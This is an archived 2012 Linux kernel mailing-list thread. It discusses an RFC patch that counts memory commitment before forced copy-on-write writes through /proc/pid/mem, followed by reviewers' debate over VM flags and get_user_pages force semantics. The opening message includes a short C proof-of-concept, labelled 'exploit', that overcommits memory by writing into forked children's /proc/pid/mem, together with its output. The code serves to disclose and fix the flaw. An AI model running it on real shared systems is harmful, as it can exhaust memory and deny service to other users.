linux-kernel.vger.kernel.org archive mirror
 help / color / mirror / Atom feed
* [PATCH RFC] mm: account VMA before forced-COW via /proc/pid/mem
@ 2012-04-02 15:36 Konstantin Khlebnikov
  2012-04-03 14:37 ` Oleg Nesterov
  0 siblings, 1 reply; 11+ messages in thread
From: Konstantin Khlebnikov @ 2012-04-02 15:36 UTC (permalink / raw)
  To: linux-mm, linux-kernel
  Cc: Hugh Dickins, Andrew Morton, Linus Torvalds, Oleg Nesterov

Currently kernel does not account read-only private mappings into memory commitment.
But these mappings can be force-COW-ed in get_user_pages(). This way we can freely
overcommit memory usage. And I'm afraid not only /proc/pid/mem able to trigger this.

This patch counts VMA into memory commitment before forced-COW in /proc/pid/mem.

Signed-off-by: Konstantin Khlebnikov <khlebnikov@openvz.org>

---

before patch:

$ ./private-overcommit 6
before:
AnonPages:        705912 kB
CommitLimit:     3964536 kB
Committed_AS:    1225340 kB
after:
AnonPages:       6991060 kB
CommitLimit:     3964536 kB
Committed_AS:    1226596 kB

after patch:

$ ./private-overcommit 6
before:
AnonPages:         98760 kB
CommitLimit:     3964512 kB
Committed_AS:     369864 kB
after:
AnonPages:       6378052 kB
CommitLimit:     3964512 kB
Committed_AS:    6662064 kB

Now overcommit control can work:

$ sudo sysctl vm.overcommit_memory=2
$ ./private-overcommit 6
before:
AnonPages:        105252 kB
CommitLimit:     3964512 kB
Committed_AS:     386884 kB
pwrite: Input/output error
pwrite: Input/output error
pwrite: Input/output error
after:
AnonPages:       3292332 kB
CommitLimit:     3964512 kB
Committed_AS:    3533468 kB

exploit:

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <signal.h>
#include <fcntl.h>

int main (int argc, char **argv)
{
	size_t size = 1 << 30, off;
	int count;
	void *ptr;
	int pid = 0, fd;
	char path[64];

	count = (argc > 1) ? atoi(argv[1]) : 1;

	system("echo before:");
	system("grep AnonPages /proc/meminfo");
	system("grep Commit /proc/meminfo");

	if (setpgid(0, 0))
		return 2;

	ptr = mmap(NULL, size, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
	if (ptr == MAP_FAILED)
		return 2;

	while (count--) {
		pid = fork();
		if (pid < 0) {
			perror("fork");
			break;
		}
		if (pid == 0) {
			pause();
			return 0;
		}
		sprintf(path, "/proc/%d/mem", pid);
		fd = open(path, O_RDWR);
		if (fd < 0) {
			perror("open");
			break;
		}
		for (off = 0; off < size ; off += 4096)
			if (pwrite(fd, "*", 1, (unsigned long)ptr + off) != 1) {
				perror("pwrite");
				break;
			}
	}

	system("echo after:");
	system("grep AnonPages /proc/meminfo");
	system("grep Commit /proc/meminfo");

	kill(0, SIGINT);
	return 0;
}
---
 mm/memory.c |   54 ++++++++++++++++++++++++++++++++++++++++++++++++++++--
 1 files changed, 52 insertions(+), 2 deletions(-)

diff --git a/mm/memory.c b/mm/memory.c
index 9b8db37..c2c97d8 100644
--- a/mm/memory.c
+++ b/mm/memory.c
@@ -57,6 +57,7 @@
 #include <linux/swapops.h>
 #include <linux/elf.h>
 #include <linux/gfp.h>
+#include <linux/security.h>
 
 #include <asm/io.h>
 #include <asm/pgalloc.h>
@@ -3790,6 +3791,43 @@ int generic_access_phys(struct vm_area_struct *vma, unsigned long addr,
 #endif
 
 /*
+ * Verifies that vma is accounted, otherwise tries to charge it.
+ * Returns length of accounted area starting from given address.
+ */
+static unsigned long __account_vma(struct mm_struct *mm,
+		struct vm_area_struct **pvma, unsigned long addr)
+{
+	struct vm_area_struct *vma = *pvma;
+	unsigned long ret;
+
+	/*
+	 * Already accounted or not accountable?
+	 * See accountable_mapping() and mprotect_fixup().
+	 */
+	if ((vma->vm_flags & (VM_ACCOUNT | VM_NORESERVE | VM_SHARED |
+				VM_HUGETLB | VM_MAYWRITE)) != VM_MAYWRITE)
+		return vma->vm_end - addr;
+
+	up_read(&mm->mmap_sem);
+	down_write(&mm->mmap_sem);
+	*pvma = vma = find_vma(mm, addr);
+	if (vma && vma->vm_start <= addr) {
+		ret = vma->vm_end - addr;
+		if ((vma->vm_flags & (VM_ACCOUNT | VM_NORESERVE | VM_SHARED |
+				VM_HUGETLB | VM_MAYWRITE)) == VM_MAYWRITE) {
+			if (!security_vm_enough_memory_mm(mm, vma_pages(vma)))
+				vma->vm_flags |= VM_ACCOUNT;
+			else
+				ret = 0;
+		}
+	} else
+		ret = 0;
+	downgrade_write(&mm->mmap_sem);
+
+	return ret;
+}
+
+/*
  * Access another process' address space as given in mm.  If non-NULL, use the
  * given task for page fault accounting.
  */
@@ -3798,6 +3836,7 @@ static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
 {
 	struct vm_area_struct *vma;
 	void *old_buf = buf;
+	unsigned long force = write ? 0 : ULONG_MAX;
 
 	down_read(&mm->mmap_sem);
 	/* ignore errors, just check how much was successfully transferred */
@@ -3806,15 +3845,24 @@ static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
 		void *maddr;
 		struct page *page = NULL;
 
+again:
 		ret = get_user_pages(tsk, mm, addr, 1,
-				write, 1, &page, &vma);
+				write, force > 0, &page, &vma);
 		if (ret <= 0) {
+			vma = find_vma(mm, addr);
+			if (!vma || vma->vm_start > addr)
+				break;
+			/*
+			 * Use forced-COW only on accounted-vma, otherwise
+			 * we can COW too much and overcommit memory usage.
+			 */
+			if (!force && (force = __account_vma(mm, &vma, addr)))
+				goto again;
 			/*
 			 * Check if this is a VM_IO | VM_PFNMAP VMA, which
 			 * we can access using slightly different code.
 			 */
 #ifdef CONFIG_HAVE_IOREMAP_PROT
-			vma = find_vma(mm, addr);
 			if (!vma || vma->vm_start > addr)
 				break;
 			if (vma->vm_ops && vma->vm_ops->access)
@@ -3842,6 +3890,8 @@ static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
 			kunmap(page);
 			page_cache_release(page);
 		}
+		if (force)
+			force -= bytes;
 		len -= bytes;
 		buf += bytes;
 		addr += bytes;


^ permalink raw reply related	[flat|nested] 11+ messages in thread

* Re: [PATCH RFC] mm: account VMA before forced-COW via /proc/pid/mem
  2012-04-02 15:36 [PATCH RFC] mm: account VMA before forced-COW via /proc/pid/mem Konstantin Khlebnikov
@ 2012-04-03 14:37 ` Oleg Nesterov
  2012-04-04  9:59   ` Konstantin Khlebnikov
  0 siblings, 1 reply; 11+ messages in thread
From: Oleg Nesterov @ 2012-04-03 14:37 UTC (permalink / raw)
  To: Konstantin Khlebnikov
  Cc: linux-mm, linux-kernel, Hugh Dickins, Andrew Morton, Linus Torvalds

On 04/02, Konstantin Khlebnikov wrote:
>
> Currently kernel does not account read-only private mappings into memory commitment.
> But these mappings can be force-COW-ed in get_user_pages().

Heh. tail -n3 Documentation/vm/overcommit-accounting
may be you should update it then.

Can't really comment the patch, this is not my area. Still,

> +	down_write(&mm->mmap_sem);
> +	*pvma = vma = find_vma(mm, addr);
> +	if (vma && vma->vm_start <= addr) {
> +		ret = vma->vm_end - addr;
> +		if ((vma->vm_flags & (VM_ACCOUNT | VM_NORESERVE | VM_SHARED |
> +				VM_HUGETLB | VM_MAYWRITE)) == VM_MAYWRITE) {
> +			if (!security_vm_enough_memory_mm(mm, vma_pages(vma)))

Oooooh, the whole vma. Say, gdb installs the single breakpoint into
the huge .text mapping...

I am not sure, but probably you want to check at least VM_IO/PFNMAP
as well. We do not want to charge this memory and retry with FOLL_FORCE
before vm_ops->access(). Say, /dev/mem.

Hmm. OTOH, if I am right then mprotect_fixup() should be fixed??


We drop ->mmap_sem... Say, the task does mremap() in between and
len == 2 * PAGE_SIZE. Then, for example, copy_to_user_page() can
write to the same page twice. Perhaps not a problem in practice,
I dunno.

Oleg.


^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: [PATCH RFC] mm: account VMA before forced-COW via /proc/pid/mem
  2012-04-03 14:37 ` Oleg Nesterov
@ 2012-04-04  9:59   ` Konstantin Khlebnikov
  2012-04-04 15:41     ` Oleg Nesterov
  0 siblings, 1 reply; 11+ messages in thread
From: Konstantin Khlebnikov @ 2012-04-04  9:59 UTC (permalink / raw)
  To: Oleg Nesterov
  Cc: linux-mm, linux-kernel, Hugh Dickins, Andrew Morton, Linus Torvalds

Oleg Nesterov wrote:
> On 04/02, Konstantin Khlebnikov wrote:
>>
>> Currently kernel does not account read-only private mappings into memory commitment.
>> But these mappings can be force-COW-ed in get_user_pages().
>
> Heh. tail -n3 Documentation/vm/overcommit-accounting
> may be you should update it then.

I just wonder how fragile this accounting...

>
> Can't really comment the patch, this is not my area. Still,
>
>> +	down_write(&mm->mmap_sem);
>> +	*pvma = vma = find_vma(mm, addr);
>> +	if (vma&&  vma->vm_start<= addr) {
>> +		ret = vma->vm_end - addr;
>> +		if ((vma->vm_flags&  (VM_ACCOUNT | VM_NORESERVE | VM_SHARED |
>> +				VM_HUGETLB | VM_MAYWRITE)) == VM_MAYWRITE) {
>> +			if (!security_vm_enough_memory_mm(mm, vma_pages(vma)))
>
> Oooooh, the whole vma. Say, gdb installs the single breakpoint into
> the huge .text mapping...

We cannot split vma right there, this will be really weird. =)

>
> I am not sure, but probably you want to check at least VM_IO/PFNMAP
> as well. We do not want to charge this memory and retry with FOLL_FORCE
> before vm_ops->access(). Say, /dev/mem

No, VM_IO/PFNMAP aren't affect accounting, there is VM_NORESERVE for this.

>
> Hmm. OTOH, if I am right then mprotect_fixup() should be fixed??

mprotect_fixup() does not account area if it already accounted, so all ok.

>
>
> We drop ->mmap_sem... Say, the task does mremap() in between and
> len == 2 * PAGE_SIZE. Then, for example, copy_to_user_page() can
> write to the same page twice. Perhaps not a problem in practice,
> I dunno.

I have an old unfinished patch which implements upgrade_read() for rw-semaphore =)

 >

^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: [PATCH RFC] mm: account VMA before forced-COW via /proc/pid/mem
  2012-04-04  9:59   ` Konstantin Khlebnikov
@ 2012-04-04 15:41     ` Oleg Nesterov
  2012-04-05  8:31       ` Konstantin Khlebnikov
  0 siblings, 1 reply; 11+ messages in thread
From: Oleg Nesterov @ 2012-04-04 15:41 UTC (permalink / raw)
  To: Konstantin Khlebnikov
  Cc: linux-mm, linux-kernel, Hugh Dickins, Andrew Morton, Linus Torvalds

On 04/04, Konstantin Khlebnikov wrote:
>
> Oleg Nesterov wrote:
>> On 04/02, Konstantin Khlebnikov wrote:
>>>
>>> Currently kernel does not account read-only private mappings into memory commitment.
>>> But these mappings can be force-COW-ed in get_user_pages().
>>
>> Heh. tail -n3 Documentation/vm/overcommit-accounting
>> may be you should update it then.
>
> I just wonder how fragile this accounting...

I meant, this patch could also remove this "TODO" from the docs.

>> Can't really comment the patch, this is not my area. Still,
>>
>>> +	down_write(&mm->mmap_sem);
>>> +	*pvma = vma = find_vma(mm, addr);
>>> +	if (vma&&  vma->vm_start<= addr) {
>>> +		ret = vma->vm_end - addr;
>>> +		if ((vma->vm_flags&  (VM_ACCOUNT | VM_NORESERVE | VM_SHARED |
>>> +				VM_HUGETLB | VM_MAYWRITE)) == VM_MAYWRITE) {
>>> +			if (!security_vm_enough_memory_mm(mm, vma_pages(vma)))
>>
>> Oooooh, the whole vma. Say, gdb installs the single breakpoint into
>> the huge .text mapping...
>
> We cannot split vma right there, this will be really weird. =)

Sure, I understand why you did it this way.

>> I am not sure, but probably you want to check at least VM_IO/PFNMAP
>> as well. We do not want to charge this memory and retry with FOLL_FORCE
>> before vm_ops->access(). Say, /dev/mem
>
> No, VM_IO/PFNMAP aren't affect accounting, there is VM_NORESERVE for this.

You misunderstood. Again, I can be wrong, but.

Suppose the task mmmaps /dev/mem (for example). This vma doesn't have
VM_NORESERVE (but it has VM_IO).

gup() fails correctly with or without FOLL_FORCE, we should fallback
to vma_ops->access().

However. With your patch __access_remote_vm() tries gup() without
FOLL_FORCE first and wrongly assumes that it fails because it neeeds
FOLL_FORCE and we are going to force-cow.

So __account_vma() adds VM_ACCOUNT before (unnecessary) retry, and
this is unnecessary too and wrong.

>> Hmm. OTOH, if I am right then mprotect_fixup() should be fixed??
>
> mprotect_fixup() does not account area if it already accounted, so all ok.

No, I meant another thing. But yes, I think I was wrong, mprotect_fixup()
is fine.

>> We drop ->mmap_sem... Say, the task does mremap() in between and
>> len == 2 * PAGE_SIZE. Then, for example, copy_to_user_page() can
>> write to the same page twice. Perhaps not a problem in practice,
>> I dunno.
>
> I have an old unfinished patch which implements upgrade_read() for rw-semaphore =)

Interesting ;)

Oleg.


^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: [PATCH RFC] mm: account VMA before forced-COW via /proc/pid/mem
  2012-04-04 15:41     ` Oleg Nesterov
@ 2012-04-05  8:31       ` Konstantin Khlebnikov
  2012-04-07  4:21         ` Hugh Dickins
  0 siblings, 1 reply; 11+ messages in thread
From: Konstantin Khlebnikov @ 2012-04-05  8:31 UTC (permalink / raw)
  To: Oleg Nesterov
  Cc: linux-mm, linux-kernel, Hugh Dickins, Andrew Morton, Linus Torvalds

Oleg Nesterov wrote:
> On 04/04, Konstantin Khlebnikov wrote:
>>
>> Oleg Nesterov wrote:
>>> On 04/02, Konstantin Khlebnikov wrote:
>>>>
>>>> Currently kernel does not account read-only private mappings into memory commitment.
>>>> But these mappings can be force-COW-ed in get_user_pages().
>>>
>>> Heh. tail -n3 Documentation/vm/overcommit-accounting
>>> may be you should update it then.
>>
>> I just wonder how fragile this accounting...
>
> I meant, this patch could also remove this "TODO" from the docs.

Actually I dug into this code for killing VM_ACCOUNT vma flag.
Currently we cannot do this only because asymmetry in mprotect_fixup():
it account vma on read-only -> writable conversion, but keep on backward operation.
Probably we can kill this asymmetry, and after that we can recognize accountable vma
by its others flags state, so we don't need special VM_ACCOUNT for this.

>
>>> Can't really comment the patch, this is not my area. Still,
>>>
>>>> +	down_write(&mm->mmap_sem);
>>>> +	*pvma = vma = find_vma(mm, addr);
>>>> +	if (vma&&   vma->vm_start<= addr) {
>>>> +		ret = vma->vm_end - addr;
>>>> +		if ((vma->vm_flags&   (VM_ACCOUNT | VM_NORESERVE | VM_SHARED |
>>>> +				VM_HUGETLB | VM_MAYWRITE)) == VM_MAYWRITE) {
>>>> +			if (!security_vm_enough_memory_mm(mm, vma_pages(vma)))
>>>
>>> Oooooh, the whole vma. Say, gdb installs the single breakpoint into
>>> the huge .text mapping...
>>
>> We cannot split vma right there, this will be really weird. =)
>
> Sure, I understand why you did it this way.
>
>>> I am not sure, but probably you want to check at least VM_IO/PFNMAP
>>> as well. We do not want to charge this memory and retry with FOLL_FORCE
>>> before vm_ops->access(). Say, /dev/mem
>>
>> No, VM_IO/PFNMAP aren't affect accounting, there is VM_NORESERVE for this.
>
> You misunderstood. Again, I can be wrong, but.
>
> Suppose the task mmmaps /dev/mem (for example). This vma doesn't have
> VM_NORESERVE (but it has VM_IO).
>
> gup() fails correctly with or without FOLL_FORCE, we should fallback
> to vma_ops->access().

Yes, seems so. Maybe we should use ->access() before get_user_pages().

>
> However. With your patch __access_remote_vm() tries gup() without
> FOLL_FORCE first and wrongly assumes that it fails because it neeeds
> FOLL_FORCE and we are going to force-cow.
>
> So __account_vma() adds VM_ACCOUNT before (unnecessary) retry, and
> this is unnecessary too and wrong.
>
>>> Hmm. OTOH, if I am right then mprotect_fixup() should be fixed??
>>
>> mprotect_fixup() does not account area if it already accounted, so all ok.
>
> No, I meant another thing. But yes, I think I was wrong, mprotect_fixup()
> is fine.
>
>>> We drop ->mmap_sem... Say, the task does mremap() in between and
>>> len == 2 * PAGE_SIZE. Then, for example, copy_to_user_page() can
>>> write to the same page twice. Perhaps not a problem in practice,
>>> I dunno.
>>
>> I have an old unfinished patch which implements upgrade_read() for rw-semaphore =)
>
> Interesting ;)

Yeah, after upgrade_read() we cannot remove vmas, but we can add new and change existing.

>

^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: [PATCH RFC] mm: account VMA before forced-COW via /proc/pid/mem
  2012-04-05  8:31       ` Konstantin Khlebnikov
@ 2012-04-07  4:21         ` Hugh Dickins
  2012-04-07  5:11           ` Konstantin Khlebnikov
  2012-04-07 17:33           ` Oleg Nesterov
  0 siblings, 2 replies; 11+ messages in thread
From: Hugh Dickins @ 2012-04-07  4:21 UTC (permalink / raw)
  To: Konstantin Khlebnikov
  Cc: Oleg Nesterov, linux-mm, linux-kernel, Roland Dreier,
	Andrew Morton, Linus Torvalds

On Thu, 5 Apr 2012, Konstantin Khlebnikov wrote:
> Oleg Nesterov wrote:
> > On 04/04, Konstantin Khlebnikov wrote:
> > > Oleg Nesterov wrote:
> > > > On 04/02, Konstantin Khlebnikov wrote:
> > > > > 
> > > > > Currently kernel does not account read-only private mappings into
> > > > > memory commitment.
> > > > > But these mappings can be force-COW-ed in get_user_pages().
> > > > 
> > > > Heh. tail -n3 Documentation/vm/overcommit-accounting
> > > > may be you should update it then.
> > > 
> > > I just wonder how fragile this accounting...
> > 
> > I meant, this patch could also remove this "TODO" from the docs.
> 
> Actually I dug into this code for killing VM_ACCOUNT vma flag.
> Currently we cannot do this only because asymmetry in mprotect_fixup():
> it account vma on read-only -> writable conversion, but keep on backward
> operation.
> Probably we can kill this asymmetry, and after that we can recognize
> accountable vma
> by its others flags state, so we don't need special VM_ACCOUNT for this.

(I believe the VM_ACCOUNT flag will need to stay.)

But this is just a quick note to say that I'm not ignoring you: I have
a strong interest in this, but only now found time to look through the
thread and ponder, and I'm not yet ready to decide.

I've long detested that behaviour of GUP write,force, and my strong
preference would be not to layer more strangeness upon strangeness,
but limit the damage by making GUP write,force fail in that case,
instead of inserting a PageAnon page into a VM_SHARED mapping.

I think it's unlikely that it will cause a regression in real life
(it already fails if you did not open the mmap'ed file for writing),
but it would be a user-visible change in behaviour, and I've research
to do before arriving at a conclusion.

Hugh

^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: [PATCH RFC] mm: account VMA before forced-COW via /proc/pid/mem
  2012-04-07  4:21         ` Hugh Dickins
@ 2012-04-07  5:11           ` Konstantin Khlebnikov
  2012-04-10  0:34             ` Hugh Dickins
  2012-04-07 17:33           ` Oleg Nesterov
  1 sibling, 1 reply; 11+ messages in thread
From: Konstantin Khlebnikov @ 2012-04-07  5:11 UTC (permalink / raw)
  To: Hugh Dickins
  Cc: Oleg Nesterov, linux-mm, linux-kernel, Roland Dreier,
	Andrew Morton, Linus Torvalds

Hugh Dickins wrote:
> On Thu, 5 Apr 2012, Konstantin Khlebnikov wrote:
>> Oleg Nesterov wrote:
>>> On 04/04, Konstantin Khlebnikov wrote:
>>>> Oleg Nesterov wrote:
>>>>> On 04/02, Konstantin Khlebnikov wrote:
>>>>>>
>>>>>> Currently kernel does not account read-only private mappings into
>>>>>> memory commitment.
>>>>>> But these mappings can be force-COW-ed in get_user_pages().
>>>>>
>>>>> Heh. tail -n3 Documentation/vm/overcommit-accounting
>>>>> may be you should update it then.
>>>>
>>>> I just wonder how fragile this accounting...
>>>
>>> I meant, this patch could also remove this "TODO" from the docs.
>>
>> Actually I dug into this code for killing VM_ACCOUNT vma flag.
>> Currently we cannot do this only because asymmetry in mprotect_fixup():
>> it account vma on read-only ->  writable conversion, but keep on backward
>> operation.
>> Probably we can kill this asymmetry, and after that we can recognize
>> accountable vma
>> by its others flags state, so we don't need special VM_ACCOUNT for this.
>
> (I believe the VM_ACCOUNT flag will need to stay.)
>
> But this is just a quick note to say that I'm not ignoring you: I have
> a strong interest in this, but only now found time to look through the
> thread and ponder, and I'm not yet ready to decide.
>
> I've long detested that behaviour of GUP write,force, and my strong
> preference would be not to layer more strangeness upon strangeness,
> but limit the damage by making GUP write,force fail in that case,
> instead of inserting a PageAnon page into a VM_SHARED mapping.
>
> I think it's unlikely that it will cause a regression in real life
> (it already fails if you did not open the mmap'ed file for writing),
> but it would be a user-visible change in behaviour, and I've research
> to do before arriving at a conclusion.

Agree, but this stuff is very weak. Even if sysctl vm.overcommit_memory=2,
probably we should fixup accounting in /proc/pid/mem only for this case,
because vm.overcommit_memory=2 supposed to protect against overcommit, but it does not.

>
> Hugh


^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: [PATCH RFC] mm: account VMA before forced-COW via /proc/pid/mem
  2012-04-07  4:21         ` Hugh Dickins
  2012-04-07  5:11           ` Konstantin Khlebnikov
@ 2012-04-07 17:33           ` Oleg Nesterov
  2012-04-10  1:04             ` Hugh Dickins
  1 sibling, 1 reply; 11+ messages in thread
From: Oleg Nesterov @ 2012-04-07 17:33 UTC (permalink / raw)
  To: Hugh Dickins
  Cc: Konstantin Khlebnikov, linux-mm, linux-kernel, Roland Dreier,
	Andrew Morton, Linus Torvalds

On 04/06, Hugh Dickins wrote:
>
> I've long detested that behaviour of GUP write,force, and my strong
> preference would be not to layer more strangeness upon strangeness,
> but limit the damage by making GUP write,force fail in that case,
> instead of inserting a PageAnon page into a VM_SHARED mapping.
>
> I think it's unlikely that it will cause a regression in real life
> (it already fails if you did not open the mmap'ed file for writing),

Yes, and this is what looks confusing to me. Assuming I understand
you (and the code) correctly ;)

If we have a (PROT_READ, MAP_SHARED) file mapping, then FOLL_FORCE
works depending on "file->f_mode & FMODE_WRITE".

Afaics, because do_mmap_pgoff(MAP_SHARED) clears VM_MAYWRITE if
!FMODE_WRITE, and gup(FORCE) checks "vma->vm_flags & VM_MAYWRITE"
before follow_page/etc.

OTOH, if the file was opened without FMODE_WRITE, then I do not
really understand how (PROT_READ, MAP_SHARED) differs from
(PROT_READ, MAP_PRIVATE). However, in the latter case FOLL_FORCE
works, VM_MAYWRITE was not cleared.

Speaking of the difference above, I'd wish I could understand
what VM_MAYSHARE actually means except "MAP_SHARED was used".

Oleg.


^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: [PATCH RFC] mm: account VMA before forced-COW via /proc/pid/mem
  2012-04-07  5:11           ` Konstantin Khlebnikov
@ 2012-04-10  0:34             ` Hugh Dickins
  0 siblings, 0 replies; 11+ messages in thread
From: Hugh Dickins @ 2012-04-10  0:34 UTC (permalink / raw)
  To: Konstantin Khlebnikov
  Cc: Oleg Nesterov, linux-mm, linux-kernel, Roland Dreier,
	Stephen Wilson, Andrew Morton, Linus Torvalds

On Sat, 7 Apr 2012, Konstantin Khlebnikov wrote:
> Hugh Dickins wrote:
> > 
> > I've long detested that behaviour of GUP write,force, and my strong
> > preference would be not to layer more strangeness upon strangeness,
> > but limit the damage by making GUP write,force fail in that case,
> > instead of inserting a PageAnon page into a VM_SHARED mapping.
> > 
> > I think it's unlikely that it will cause a regression in real life
> > (it already fails if you did not open the mmap'ed file for writing),
> > but it would be a user-visible change in behaviour, and I've research
> > to do before arriving at a conclusion.
> 
> Agree, but this stuff is very weak. Even if sysctl vm.overcommit_memory=2,
> probably we should fixup accounting in /proc/pid/mem only for this case,
> because vm.overcommit_memory=2 supposed to protect against overcommit, but it
> does not.

You are right (and it's not the first time I've had to say so!).

At first I was puzzled by your answer, then went back to your initial
mail, which clearly says "Currently kernel does not account read-only
private mappings into memory commitment.  But these mappings can be
force-COW-ed in get_user_pages()" and realized (a) that I'd forgotten
about that weakness in the overcommit stuff, and (b) that I'd therefore
let my obsession with the anon-in-shared issue blind me to what you were
actually saying.  "private", yes, sorry about that.  Let's set aside the
shared issue for the moment, then, though I'll need to answer Oleg after
(and writing to /proc/pid/mem makes that more serious than before too).

Yes, GUP force-write into private-readonly can violate no-overcommit.

Force-write was originally intended just for setting breakpoints with
ptrace(2), and we've taken the view that fixing the no-overcommit issue
is simply more trouble than it's worth.  But I agree with you that once
writing to /proc/pid/mem was enabled a year ago, it became a more serious
defect: I don't think /proc/pid/mem makes anything new possible, but it
does make it easier - I imagine dd(1) could achieve the same as your
little program.

I was hoping to find that writing to /proc/pid/mem was enabled solely
because "why not?", and the 198214a7ee commit message does suggest so;
but I see there was a 0/12 mail which never reached git, which makes
clear that it was intended for debuggers to use instead of ptrace(2).
So I think my first reaction, to disallow write-force on readonly via
/proc/pid/mem, would not be helpful.

I think all solutions to this are unsatifactory, and most ugly.
I'd better pull up your original mail to review in detail, but I'd
say yours is no exception: ugly and unsatisfactory, but quite possibly
less ugly and less unsatisfactory than most.  I was quite happy to be
doing nothing at all about this, but now that you've raised the matter,
I can understand that you won't want it to rest there.

Of course, the issue can be dealt with by an additional data structure;
but extending vm_area_struct or anon_vma (if only by one usually-NULL
pointer), and adding the code to handle it, would itself be
unsatisfactory - and I guess you felt the same.

Hugh

^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: [PATCH RFC] mm: account VMA before forced-COW via /proc/pid/mem
  2012-04-07 17:33           ` Oleg Nesterov
@ 2012-04-10  1:04             ` Hugh Dickins
  2012-04-10  1:35               ` Oleg Nesterov
  0 siblings, 1 reply; 11+ messages in thread
From: Hugh Dickins @ 2012-04-10  1:04 UTC (permalink / raw)
  To: Oleg Nesterov
  Cc: Konstantin Khlebnikov, linux-mm, linux-kernel, Roland Dreier,
	Andrew Morton, Linus Torvalds

On Sat, 7 Apr 2012, Oleg Nesterov wrote:
> On 04/06, Hugh Dickins wrote:
> >
> > I've long detested that behaviour of GUP write,force, and my strong
> > preference would be not to layer more strangeness upon strangeness,
> > but limit the damage by making GUP write,force fail in that case,
> > instead of inserting a PageAnon page into a VM_SHARED mapping.

Let me reiterate here that I was off at a tangent in bringing this up,
so sorry for any confusion I spread.

> >
> > I think it's unlikely that it will cause a regression in real life
> > (it already fails if you did not open the mmap'ed file for writing),
> 
> Yes, and this is what looks confusing to me. Assuming I understand
> you (and the code) correctly ;)
> 
> If we have a (PROT_READ, MAP_SHARED) file mapping, then FOLL_FORCE
> works depending on "file->f_mode & FMODE_WRITE".
> 
> Afaics, because do_mmap_pgoff(MAP_SHARED) clears VM_MAYWRITE if
> !FMODE_WRITE, and gup(FORCE) checks "vma->vm_flags & VM_MAYWRITE"
> before follow_page/etc.
> 
> OTOH, if the file was opened without FMODE_WRITE, then I do not
> really understand how (PROT_READ, MAP_SHARED) differs from
> (PROT_READ, MAP_PRIVATE).

For normal msyscalls(), !FMODE_WRITE PROT_READ,MAP_SHARED and
PROT_READ,MAP_PRIVATE behave much the same: the difference is that
you can mprotect(PROT_WRITE) the MAP_PRIVATE one, but you cannot
mprotect(PROT_WRITE) the MAP_SHARED - because writes to the latter
would go to the file, and you don't have permission for that.

> However, in the latter case FOLL_FORCE
> works, VM_MAYWRITE was not cleared.

When it comes to __get_user_pages(), FOLL_FORCE allows you to
read from or write to an area to which you don't at present have
read or write access, but could be mprotect()ed to give you that
access (whereas !FOLL_FORCE respects the current mprotection).

So FOLL_FORCE allows reading from any mapped area, even PROT_NONE;
and FOLL_FORCE allows writing to any MAP_PRIVATE area, and writing
to any MAP_SHARED area whose file had been opened with FMODE_WRITE.

The strange weird confusing part is that having checked that you have
permission to write to the file, it then avoids doing so (unless the
area currently has PROT_WRITE): it COWs pages for you instead,
leaving unexpected anon pages in the shared area.

This is believed to be a second line of defence when setting
breakpoints, in case the executable file happened to  have been opened
for writing, to prevent those breakpoints getting back into the file.

> 
> Speaking of the difference above, I'd wish I could understand
> what VM_MAYSHARE actually means except "MAP_SHARED was used".

That's precisely it: so it's very useful in /proc/pid/maps, for
deciding whether to show an 's' or a 'p', but not so often when
real decisions are made (where, as you've observed, private readonly
and shared readonly are treated very similarly, without VM_SHARED).

Hugh

^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: [PATCH RFC] mm: account VMA before forced-COW via /proc/pid/mem
  2012-04-10  1:04             ` Hugh Dickins
@ 2012-04-10  1:35               ` Oleg Nesterov
  0 siblings, 0 replies; 11+ messages in thread
From: Oleg Nesterov @ 2012-04-10  1:35 UTC (permalink / raw)
  To: Hugh Dickins
  Cc: Konstantin Khlebnikov, linux-mm, linux-kernel, Roland Dreier,
	Andrew Morton, Linus Torvalds

On 04/09, Hugh Dickins wrote:
>
> Let me reiterate here that I was off at a tangent in bringing this up,
> so sorry for any confusion I spread.

I guess it was me who added the confusion ;)

> > OTOH, if the file was opened without FMODE_WRITE, then I do not
> > really understand how (PROT_READ, MAP_SHARED) differs from
> > (PROT_READ, MAP_PRIVATE).

I meant, from gup(FOLL_FORCE|FOLL_WRITE) pov. I didn't mean mprotect/etc.

> The strange weird confusing part is that having checked that you have
> permission to write to the file, it then avoids doing so (unless the
> area currently has PROT_WRITE): it COWs pages for you instead,
> leaving unexpected anon pages in the shared area.

Yes, and we could do the same in (PROT_READ, MAP_SHARED) case.

This is what looks strange to me. We require PROT_WRITE to force-
cow, although we are not going (and shouldn't) write to the file.


But, to avoid even more confusion, I am not arguing with your
"limit the damage by making GUP write,force fail in that case"
suggestion. At least I do not think ptrace/gdb can suffer.

> > Speaking of the difference above, I'd wish I could understand
> > what VM_MAYSHARE actually means except "MAP_SHARED was used".
>
> That's precisely it: so it's very useful in /proc/pid/maps, for
> deciding whether to show an 's' or a 'p', but not so often when
> real decisions are made (where, as you've observed, private readonly
> and shared readonly are treated very similarly, without VM_SHARED).

Aha, thanks a lot.

Oleg.


^ permalink raw reply	[flat|nested] 11+ messages in thread

end of thread, other threads:[~2012-04-10  1:36 UTC | newest]

Thread overview: 11+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2012-04-02 15:36 [PATCH RFC] mm: account VMA before forced-COW via /proc/pid/mem Konstantin Khlebnikov
2012-04-03 14:37 ` Oleg Nesterov
2012-04-04  9:59   ` Konstantin Khlebnikov
2012-04-04 15:41     ` Oleg Nesterov
2012-04-05  8:31       ` Konstantin Khlebnikov
2012-04-07  4:21         ` Hugh Dickins
2012-04-07  5:11           ` Konstantin Khlebnikov
2012-04-10  0:34             ` Hugh Dickins
2012-04-07 17:33           ` Oleg Nesterov
2012-04-10  1:04             ` Hugh Dickins
2012-04-10  1:35               ` Oleg Nesterov

